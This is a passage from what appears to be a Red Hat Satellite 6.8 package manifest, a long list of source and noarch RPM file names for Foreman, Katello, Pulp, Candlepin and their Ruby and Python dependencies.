redhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm repoview-0.6.6-11.el7sat.src.rpm rh-postgresql12-postgresql-evr-0.0.2-1.el7sat.src.rpm rhel8-kickstart-setup-0.0.2-1.el7sat.src.rpm rubygem-facter-2.4.1-2.el7sat.src.rpm rubygem-fast_gettext-1.1.0-4.el7sat.src.rpm rubygem-foreman_scap_client-0.4.6-1.el7sat.src.rpm rubygem-highline-1.7.8-3.el7sat.src.rpm rubygem-newt-0.9.6-3.el7sat.src.rpm rubygem-oauth-0.5.4-2.el7sat.src.rpm rubygem-passenger-4.0.18-24.el7sat.src.rpm rubygem-rack-1.6.12-1.el7sat.src.rpm rubygem-rake-0.9.2.2-41.el7sat.src.rpm saslwrapper-0.22-5.el7sat.src.rpm satellite-6.8.0-1.el7sat.src.rpm satellite-installer-6.8.0.11-1.el7sat.src.rpm tfm-6.1-1.el7sat.src.rpm tfm-rubygem-actioncable-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-actionmailer-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-actionpack-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-actiontext-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-actionview-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-activejob-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-activemodel-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-activerecord-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-activerecord-import-1.0.0-6.el7sat.src.rpm tfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.src.rpm tfm-rubygem-activestorage-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-activesupport-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-addressable-2.6.0-1.el7sat.src.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm tfm-rubygem-amazing_print-1.1.0-1.el7sat.src.rpm tfm-rubygem-ancestry-3.0.7-1.el7sat.src.rpm tfm-rubygem-anemone-0.7.2-22.el7sat.src.rpm tfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.src.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm tfm-rubygem-apipie-bindings-0.3.0-1.el7sat.src.rpm tfm-rubygem-apipie-dsl-2.2.2-2.el7sat.src.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm tfm-rubygem-apipie-rails-0.5.17-3.el7sat.src.rpm tfm-rubygem-audited-4.9.0-3.el7sat.src.rpm tfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.src.rpm tfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.src.rpm tfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.src.rpm tfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.src.rpm tfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.src.rpm tfm-rubygem-bcrypt-3.1.12-1.el7sat.src.rpm tfm-rubygem-builder-3.2.4-1.el7sat.src.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm tfm-rubygem-coffee-rails-5.0.0-1.el7sat.src.rpm tfm-rubygem-coffee-script-2.4.1-4.el7sat.src.rpm tfm-rubygem-coffee-script-source-1.12.2-4.el7sat.src.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm tfm-rubygem-connection_pool-2.2.2-2.el7sat.src.rpm tfm-rubygem-crass-1.0.6-1.el7sat.src.rpm tfm-rubygem-css_parser-1.4.7-3.el7sat.src.rpm tfm-rubygem-daemons-1.2.3-7.el7sat.src.rpm tfm-rubygem-deacon-1.0.0-4.el7sat.src.rpm tfm-rubygem-declarative-0.0.10-1.el7sat.src.rpm tfm-rubygem-declarative-option-0.1.0-1.el7sat.src.rpm tfm-rubygem-deep_cloneable-3.0.0-3.el7sat.src.rpm tfm-rubygem-deface-1.5.3-2.el7sat.src.rpm tfm-rubygem-diffy-3.0.1-6.el7sat.src.rpm tfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm tfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm tfm-rubygem-erubi-1.9.0-1.el7sat.src.rpm tfm-rubygem-excon-0.58.0-3.el7sat.src.rpm tfm-rubygem-execjs-2.7.0-4.el7sat.src.rpm tfm-rubygem-facter-2.4.0-6.el7sat.src.rpm tfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm tfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.src.rpm tfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm tfm-rubygem-fast_gettext-1.4.1-3.el7sat.src.rpm tfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm tfm-rubygem-fog-aws-3.6.5-1.el7sat.src.rpm tfm-rubygem-fog-core-2.1.0-3.el7sat.src.rpm tfm-rubygem-fog-google-1.8.2-1.el7sat.src.rpm tfm-rubygem-fog-json-1.2.0-3.el7sat.src.rpm tfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.src.rpm tfm-rubygem-fog-libvirt-0.7.0-1.el7sat.src.rpm tfm-rubygem-fog-openstack-1.0.8-2.el7sat.src.rpm tfm-rubygem-fog-ovirt-1.2.5-1.el7sat.src.rpm tfm-rubygem-fog-vsphere-3.3.1-1.el7sat.src.rpm tfm-rubygem-fog-xml-0.1.2-8.el7sat.src.rpm tfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.src.rpm tfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm tfm-rubygem-foreman_ansible-5.1.3-1.el7sat.src.rpm tfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm tfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.src.rpm tfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.src.rpm tfm-rubygem-foreman_discovery-16.1.2-1.el7sat.src.rpm tfm-rubygem-foreman_hooks-0.3.16-2.el7sat.src.rpm tfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.src.rpm tfm-rubygem-foreman_leapp-0.1.6-1.el7sat.src.rpm tfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.src.rpm tfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm tfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.src.rpm tfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.src.rpm tfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.src.rpm tfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.src.rpm tfm-rubygem-formatador-0.2.1-11.el7sat.src.rpm tfm-rubygem-friendly_id-5.3.0-1.el7sat.src.rpm tfm-rubygem-fx-0.5.0-1.el7sat.src.rpm tfm-rubygem-get_process_mem-0.2.1-3.el7sat.src.rpm tfm-rubygem-gettext-3.1.4-10.el7sat.src.rpm tfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.src.rpm tfm-rubygem-git-1.5.0-1.el7sat.src.rpm tfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.src.rpm tfm-rubygem-globalid-0.4.2-1.el7sat.src.rpm tfm-rubygem-google-api-client-0.23.9-3.el7sat.src.rpm tfm-rubygem-googleauth-0.6.7-3.el7sat.src.rpm tfm-rubygem-graphql-1.8.14-1.el7sat.src.rpm tfm-rubygem-graphql-batch-0.3.10-1.el7sat.src.rpm tfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm tfm-rubygem-hammer_cli-2.1.2-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.src.rpm tfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.src.rpm tfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.src.rpm tfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm tfm-rubygem-highline-1.7.8-4.el7sat.src.rpm tfm-rubygem-http-3.3.0-1.el7sat.src.rpm tfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm tfm-rubygem-http-form_data-2.1.1-1.el7sat.src.rpm tfm-rubygem-http_parser.rb-0.6.0-1.el7sat.src.rpm tfm-rubygem-httpclient-2.8.3-1.el7sat.src.rpm tfm-rubygem-i18n-1.8.2-1.el7sat.src.rpm tfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm tfm-rubygem-ipaddress-0.8.0-11.el7sat.src.rpm tfm-rubygem-jgrep-1.3.3-12.el7sat.src.rpm tfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm tfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm tfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm tfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm tfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm tfm-rubygem-katello-3.16.0.11-1.el7sat.src.rpm tfm-rubygem-kubeclient-4.3.0-1.el7sat.src.rpm tfm-rubygem-ldap_fluff-0.4.7-5.el7sat.src.rpm tfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm tfm-rubygem-locale-2.0.9-13.el7sat.src.rpm tfm-rubygem-logging-2.2.2-6.el7sat.src.rpm tfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm tfm-rubygem-loofah-2.4.0-1.el7sat.src.rpm tfm-rubygem-mail-2.7.1-1.el7sat.src.rpm tfm-rubygem-marcel-0.3.3-1.el7sat.src.rpm tfm-rubygem-memoist-0.16.0-1.el7sat.src.rpm tfm-rubygem-method_source-0.9.2-2.el7sat.src.rpm tfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm tfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm tfm-rubygem-mimemagic-0.3.5-1.el7sat.src.rpm tfm-rubygem-mini_mime-1.0.2-1.el7sat.src.rpm tfm-rubygem-mini_portile2-2.4.0-1.el7sat.src.rpm tfm-rubygem-ms_rest-0.7.4-2.el7sat.src.rpm tfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.src.rpm tfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm tfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm tfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm tfm-rubygem-net-ldap-0.16.1-1.el7sat.src.rpm tfm-rubygem-net-ping-2.0.1-3.el7sat.src.rpm tfm-rubygem-net-scp-1.2.1-3.el7sat.src.rpm tfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm tfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm tfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm tfm-rubygem-nio4r-2.5.2-2.el7sat.src.rpm tfm-rubygem-nokogiri-1.10.9-1.el7sat.src.rpm tfm-rubygem-oauth-0.5.4-3.el7sat.src.rpm tfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm tfm-rubygem-optimist-3.0.0-1.el7sat.src.rpm tfm-rubygem-os-1.0.0-1.el7sat.src.rpm tfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.src.rpm tfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.src.rpm tfm-rubygem-parse-cron-0.1.4-4.el7sat.src.rpm tfm-rubygem-passenger-4.0.18-26.el7sat.src.rpm tfm-rubygem-pg-1.1.4-2.el7sat.src.rpm tfm-rubygem-polyglot-0.3.5-3.el7sat.src.rpm tfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm tfm-rubygem-prometheus-client-1.0.0-1.el7sat.src.rpm tfm-rubygem-promise.rb-0.7.4-1.el7sat.src.rpm tfm-rubygem-public_suffix-3.0.3-1.el7sat.src.rpm tfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.src.rpm tfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.src.rpm tfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.src.rpm tfm-rubygem-pulp_container_client-1.4.1-1.el7sat.src.rpm tfm-rubygem-pulp_file_client-1.0.1-1.el7sat.src.rpm tfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.src.rpm tfm-rubygem-pulpcore_client-3.4.1-1.el7sat.src.rpm tfm-rubygem-puma-4.3.3-4.el7sat.src.rpm tfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.src.rpm tfm-rubygem-quantile-0.2.0-3.el7sat.src.rpm tfm-rubygem-rabl-0.14.3-1.el7sat.src.rpm tfm-rubygem-rack-2.2.3-1.el7sat.src.rpm tfm-rubygem-rack-cors-1.0.2-1.el7sat.src.rpm tfm-rubygem-rack-jsonp-1.3.1-9.el7sat.src.rpm tfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm tfm-rubygem-rack-test-1.1.0-4.el7sat.src.rpm tfm-rubygem-rails-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.src.rpm tfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.src.rpm tfm-rubygem-rails-i18n-6.0.0-2.el7sat.src.rpm tfm-rubygem-railties-6.0.3.1-1.el7sat.src.rpm tfm-rubygem-rainbow-2.2.1-5.el7sat.src.rpm tfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm tfm-rubygem-rbovirt-0.1.7-4.el7sat.src.rpm tfm-rubygem-rbvmomi-2.2.0-3.el7sat.src.rpm tfm-rubygem-record_tag_helper-1.0.1-3.el7sat.src.rpm tfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.src.rpm tfm-rubygem-redhat_access-2.2.18-1.el7sat.src.rpm tfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.src.rpm tfm-rubygem-redis-4.1.2-2.el7sat.src.rpm tfm-rubygem-representable-3.0.4-1.el7sat.src.rpm tfm-rubygem-responders-3.0.0-3.el7sat.src.rpm tfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm tfm-rubygem-retriable-3.1.2-1.el7sat.src.rpm tfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm tfm-rubygem-roadie-3.4.0-3.el7sat.src.rpm tfm-rubygem-roadie-rails-2.1.1-2.el7sat.src.rpm tfm-rubygem-robotex-1.0.0-21.el7sat.src.rpm tfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm tfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm tfm-rubygem-ruby2ruby-2.4.2-3.el7sat.src.rpm tfm-rubygem-ruby_parser-3.10.1-2.el7sat.src.rpm tfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm tfm-rubygem-runcible-2.13.0-2.el7sat.src.rpm tfm-rubygem-safemode-1.3.5-2.el7sat.src.rpm tfm-rubygem-scoped_search-4.1.9-1.el7sat.src.rpm tfm-rubygem-secure_headers-6.3.0-2.el7sat.src.rpm tfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm tfm-rubygem-sexp_processor-4.10.0-5.el7sat.src.rpm tfm-rubygem-sidekiq-5.2.7-3.el7sat.src.rpm tfm-rubygem-signet-0.11.0-3.el7sat.src.rpm tfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm tfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm tfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm tfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm tfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm tfm-rubygem-sprockets-3.7.2-6.el7sat.src.rpm tfm-rubygem-sprockets-rails-3.2.1-6.el7sat.src.rpm tfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm tfm-rubygem-sshkey-1.9.0-3.el7sat.src.rpm tfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm tfm-rubygem-stomp-1.4.9-1.el7sat.src.rpm tfm-rubygem-text-1.3.0-7.el7sat.src.rpm tfm-rubygem-thor-1.0.1-2.el7sat.src.rpm tfm-rubygem-thread_safe-0.3.6-5.el7sat.src.rpm tfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm tfm-rubygem-timeliness-0.3.10-1.el7sat.src.rpm tfm-rubygem-tzinfo-1.2.6-1.el7sat.src.rpm tfm-rubygem-uber-0.1.0-1.el7sat.src.rpm tfm-rubygem-unf-0.1.3-7.el7sat.src.rpm tfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm tfm-rubygem-unicode-0.4.4.4-1.el7sat.src.rpm tfm-rubygem-unicode-display_width-1.0.5-5.el7sat.src.rpm tfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.src.rpm tfm-rubygem-webpack-rails-0.9.8-6.el7sat.src.rpm tfm-rubygem-websocket-driver-0.7.1-1.el7sat.src.rpm tfm-rubygem-websocket-extensions-0.1.5-1.el7sat.src.rpm tfm-rubygem-will_paginate-3.1.7-3.el7sat.src.rpm tfm-rubygem-x-editable-rails-1.5.5-5.el7sat.src.rpm tfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm tfm-rubygem-zeitwerk-2.2.2-1.el7sat.src.rpm
noarch: ansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm ansible-runner-1.4.6-1.el7ar.noarch.rpm ansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm ansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm ansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm candlepin-3.1.21-1.el7sat.noarch.rpm candlepin-selinux-3.1.21-1.el7sat.noarch.rpm crane-selinux-3.4.0-1.el7sat.noarch.rpm foreman-2.1.2.19-1.el7sat.noarch.rpm foreman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm foreman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm foreman-cli-2.1.2.19-1.el7sat.noarch.rpm foreman-debug-2.1.2.19-1.el7sat.noarch.rpm foreman-discovery-image-3.6.7-1.el7sat.noarch.rpm foreman-dynflow-sidekiq-2.1.2.19-1.el7sat.noarch.rpm foreman-ec2-2.1.2.19-1.el7sat.noarch.rpm foreman-gce-2.1.2.19-1.el7sat.noarch.rpm foreman-installer-2.1.2.8-1.el7sat.noarch.rpm foreman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm foreman-journald-2.1.2.19-1.el7sat.noarch.rpm foreman-libvirt-2.1.2.19-1.el7sat.noarch.rpm foreman-openstack-2.1.2.19-1.el7sat.noarch.rpm foreman-ovirt-2.1.2.19-1.el7sat.noarch.rpm foreman-postgresql-2.1.2.19-1.el7sat.noarch.rpm foreman-proxy-2.1.2-2.el7sat.noarch.rpm foreman-proxy-content-3.16.0-1.el7sat.noarch.rpm foreman-proxy-journald-2.1.2-2.el7sat.noarch.rpm foreman-selinux-2.1.2.3-1.el7sat.noarch.rpm foreman-service-2.1.2.19-1.el7sat.noarch.rpm foreman-telemetry-2.1.2.19-1.el7sat.noarch.rpm foreman-vmware-2.1.2.19-1.el7sat.noarch.rpm katello-3.16.0-1.el7sat.noarch.rpm katello-certs-tools-2.7.1-1.el7sat.noarch.rpm katello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm katello-common-3.16.0-1.el7sat.noarch.rpm katello-debug-3.16.0-1.el7sat.noarch.rpm katello-selinux-3.4.0-1.el7sat.noarch.rpm keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm kobo-0.5.1-1.el7sat.noarch.rpm pulp-admin-client-2.21.3-1.el7sat.noarch.rpm pulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm pulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm pulp-katello-1.0.3-1.el7sat.noarch.rpm pulp-maintenance-2.21.3-1.el7sat.noarch.rpm pulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm pulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm pulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm pulp-puppet-tools-2.21.3-2.el7sat.noarch.rpm pulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm pulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm pulp-selinux-2.21.3-1.el7sat.noarch.rpm pulp-server-2.21.3-1.el7sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm puppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm puppetserver-6.13.0-1.el7sat.noarch.rpm python-blinker-1.3-2.el7sat.noarch.rpm python-gnupg-0.3.7-1.el7ui.noarch.rpm python-gofer-2.12.5-7.el7sat.noarch.rpm python-gofer-qpid-2.12.5-7.el7sat.noarch.rpm python-kid-0.9.6-11.el7sat.noarch.rpm python-mongoengine-0.10.5-2.el7sat.noarch.rpm python-nectar-1.6.2-1.el7sat.noarch.rpm python-oauth2-1.5.211-8.el7sat.noarch.rpm python-pulp-bindings-2.21.3-1.el7sat.noarch.rpm python-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm python-pulp-common-2.21.3-1.el7sat.noarch.rpm python-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm python-pulp-integrity-2.21.3-2.el7sat.noarch.rpm python-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm python-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm python-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm python-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm python-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm python-pulp-streamer-2.21.3-1.el7sat.noarch.rpm python-qpid-1.35.0-5.el7.noarch.rpm python-semantic_version-2.2.0-6.el7sat.noarch.rpm python2-amqp-2.2.2-5.el7sat.noarch.rpm python2-ansible-runner-1.4.6-1.el7ar.noarch.rpm python2-anyjson-0.3.3-11.el7sat.noarch.rpm python2-apypie-0.2.2-1.el7sat.noarch.rpm python2-celery-4.0.2-9.el7sat.noarch.rpm python2-click-6.7-9.el7sat.noarch.rpm python2-crane-3.3.1-9.el7sat.noarch.rpm python2-daemon-2.1.2-7.el7at.noarch.rpm python2-django-1.11.29-1.el7sat.noarch.rpm python2-flask-0.12.2-4.el7sat.noarch.rpm python2-future-0.16.0-11.el7sat.noarch.rpm python2-isodate-0.5.4-12.el7sat.noarch.rpm python2-itsdangerous-0.24-15.el7sat.noarch.rpm python2-jinja2-2.10-10.el7sat.noarch.rpm python2-jmespath-0.9.0-6.el7_7.noarch.rpm python2-keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm python2-kombu-4.0.2-13.el7sat.noarch.rpm python2-lockfile-0.11.0-10.el7ar.noarch.rpm python2-okaara-1.0.37-2.el7sat.noarch.rpm python2-pexpect-4.6-1.el7at.noarch.rpm python2-ptyprocess-0.5.2-3.el7at.noarch.rpm python2-vine-1.1.3-6.el7sat.noarch.rpm python2-werkzeug-0.12.2-5.el7sat.noarch.rpm python3-async-timeout-3.0.1-2.el7ar.noarch.rpm python3-attrs-19.3.0-3.el7ar.noarch.rpm python3-chardet-3.0.4-10.el7ar.noarch.rpm python3-dateutil-2.8.1-2.el7ar.noarch.rpm python3-idna-2.4-2.el7ar.noarch.rpm python3-idna-ssl-1.1.0-2.el7ar.noarch.rpm python3-prometheus-client-0.7.1-2.el7ar.noarch.rpm python3-receptor-satellite-1.2.0-1.el7sat.noarch.rpm python3-six-1.11.0-8.el7ar.noarch.rpm python3-typing-extensions-3.7.4.1-2.el7ar.noarch.rpm qpid-dispatch-tools-1.5.0-4.el7.noarch.rpm qpid-tools-1.36.0-28.el7amq.noarch.rpm receptor-0.6.3-1.el7ar.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm repoview-0.6.6-11.el7sat.noarch.rpm rhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm rubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm rubygem-foreman_scap_client-0.4.6-1.el7sat.noarch.rpm rubygem-highline-1.7.8-3.el7sat.noarch.rpm rubygem-oauth-0.5.4-2.el7sat.noarch.rpm rubygem-rack-1.6.12-1.el7sat.noarch.rpm rubygem-rake-0.9.2.2-41.el7sat.noarch.rpm satellite-6.8.0-1.el7sat.noarch.rpm satellite-capsule-6.8.0-1.el7sat.noarch.rpm satellite-cli-6.8.0-1.el7sat.noarch.rpm satellite-common-6.8.0-1.el7sat.noarch.rpm satellite-debug-tools-6.8.0-1.el7sat.noarch.rpm satellite-installer-6.8.0.11-1.el7sat.noarch.rpm tfm-rubygem-actioncable-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionmailer-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionpack-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actiontext-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-actionview-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activejob-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activemodel-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activerecord-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activerecord-import-1.0.0-6.el7sat.noarch.rpm tfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.noarch.rpm tfm-rubygem-activestorage-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-activesupport-6.0.3.1-1.el7sat.noarch.rpm tfm-rubygem-addressable-2.6.0-1.el7sat.noarch.rpm tfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm tfm-rubygem-amazing_print-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-ancestry-3.0.7-1.el7sat.noarch.rpm tfm-rubygem-anemone-0.7.2-22.el7sat.noarch.rpm tfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.noarch.rpm tfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm tfm-rubygem-apipie-bindings-0.3.0-1.el7sat.noarch.rpm tfm-rubygem-apipie-dsl-2.2.2-2.el7sat.noarch.rpm tfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm tfm-rubygem-apipie-rails-0.5.17-3.el7sat.noarch.rpm tfm-rubygem-audited-4.9.0-3.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.noarch.rpm tfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.noarch.rpm tfm-rubygem-builder-3.2.4-1.el7sat.noarch.rpm tfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm tfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm tfm-rubygem-coffee-rails-5.0.0-1.el7sat.noarch.rpm tfm-rubygem-coffee-script-2.4.1-4.el7sat.noarch.rpm tfm-rubygem-coffee-script-source-1.12.2-4.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm tfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm tfm-rubygem-connection_pool-2.2.2-2.el7sat.noarch.rpm tfm-rubygem-crass-1.0.6-1.el7sat.noarch.rpm tfm-rubygem-css_parser-1.4.7-3.el7sat.noarch.rpm tfm-rubygem-daemons-1.2.3-7.el7sat.noarch.rpm tfm-rubygem-deacon-1.0.0-4.el7sat.noarch.rpm tfm-rubygem-declarative-0.0.10-1.el7sat.noarch.rpm 